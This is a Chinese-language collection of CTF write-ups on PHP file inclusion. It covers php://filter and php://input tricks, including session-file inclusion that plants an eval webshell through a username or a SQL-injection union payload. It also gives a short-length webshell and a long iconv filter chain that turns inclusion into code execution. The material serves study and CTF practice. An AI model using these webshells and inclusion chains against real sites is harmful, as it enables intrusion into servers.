php文件包含

CTF

“百度杯”CTF比赛 2017 二月场-include

可以使用
php://filter/convert.base64-encode/resource=index.php读取任意文件但是没啥用,不知道flag文件的名字
所以使用
http://ace46edd1c9f412eb50fa9cd198420223e7b80edf0ee4d9c.changame.ichunqiu.com/?path=php://input
post
<?php system("ls");?>读取目录
<?php system("cat dle345aae.php | base64");?>读取到flag

百度杯十二月–看看我的Notebook-session文件包含


之后在robots.txt发现php1nFo.php文件
http://ceb4e4f921b2444eaeb20d272f7a9cef79afe475f5c7447f.game.ichunqiu.com/action.php?module=php&file=php1nFo
发现


poc
注册用户

1
<?php @eval($_POST[cmd]);?>

登录然后查看自己的session

1
PHPSESSID:e12gf61f8dqd0vfpg4ssntdpc7

然后访问

1
http://cd674daadfa14fda832ca1e08c3ad0853810ea5951d34a15.changame.ichunqiu.com/action.php?module=txt&file=../../../tmp/SESS/sess_e12gf61f8dqd0vfpg4ssntdpc7

2020四叶草的一个session包含

首先给了2个点,一个是phpinfo,一个是lfi,但是没开远程包含,读取包含都看了一遍没有flag
这样读

1
/index.php?action=php://filter/read=convert.base64-encode/resource=login.php

登录的源码是这样的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
<?php
session_start();
error_reporting(0);
header("Content-Type: text/html; charset=UTF-8");
require_once 'config.php';

if(isset($_POST['username']) && isset($_POST['password'])){
    $username = $_POST['username'];
    $password = md5($_POST['password']);
    if($con->connect_error){
        die("db connect error");
    }
    $sql = "select * from users where username='".$username."' and password='".$password."'";
    $query = $con->query($sql);
    $row = $query->fetch_array();
    if(!empty($row)){
        echo $row['name'];
        $_SESSION['username'] = base64_encode($row[0]);
        header('Location: index.php');
        die();
    }else{
        die('<br>login error');
    }
 }
?>

首先我们发现有一个sql注入,登录的时候,session中会留下用户名的base64加密

1
username|s:8:"YWRtaW4=";

后面是用户的base64
想了很久可以包含session,但是这个base64加密后绕不过去
后来发现可以再用base64-decode一次绕过-但是还有个问题就是前面的username|s:8:"和后面的会不会影响
经过实验发现如果这个base64字符串足够长是可以忽略前面的,payload:
用户名为

1
000' union select 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa<?php eval(\$_POST[\'cmd\'])?>',3 #

密码随意
session包含得到
/index.php?action=/var/lib/php5/sess_3mck4o350rb2085cunu2mnajk6

1
username|s:120:"YWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhPD9waHAgZXZhbCgkX1BPU1RbJ2NtZCddKT8+";

再用一层解密
/index.php?action=php://filter/read=convert.base64-decode/resource=/var/lib/php5/sess_3mck4o350rb2085cunu2mnajk6
事实证明是可以的,但是用户名前面就是要加很多pad,原因有待进一步考察

NPUCTF_easyphp

这是一个无数据库的留言

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
<?php   header('content-type:application/json');
session_start();
function safe($msg) {
	if (strlen($msg)>17) {
		return "msg is too loooong!";
	} else {
		return preg_replace("/php/","?",$msg);
	}
}
if (!isset($_SESSION['msg'])&empty($_SESSION['msg']))$_SESSION['msg'] = array();
if (isset($_POST['msg'])) {
	array_push($_SESSION['msg'], ['msg'=>safe($_POST['msg']),'time'=>date('Y-m-d H:i:s',time())]);
	echo json_encode(array(['msg'=>safe($_POST['msg']),'time'=>date('Y-m-d H:i:s',time())]));
	exit();
}
if(!empty($_SESSION['msg'])) {
	echo json_encode($_SESSION['msg']);
} else {
	echo "?????????????????€???";
}
?>

大概就是把你要存的msg丢在session中,但是有2个限制,一个是17长度,一个是他是数组形式,也ban了php
官方怕payload

1
2
<?=$a=$_GET;/*
*/$a[1]($a[2]);?>

当时我做的时候的paylod,其实差不多了

1
2
3
4
5
<?Php /*
*/$a=$_GET;/*
*/extract($a);/*
*/eval($b);?>

文件包含rce

1
http://localhost:18084/index.php?0=id&&file=php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.IEC_P271.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.866.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L3.T.61|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.SJIS.GBK|convert.iconv.L10.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UJIS|convert.iconv.852.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.CP1256.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.CP1133.IBM932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.851.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.1046.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.MAC.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.MAC.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.ISO6937.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.SJIS.GBK|convert.iconv.L10.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=/proc/1/status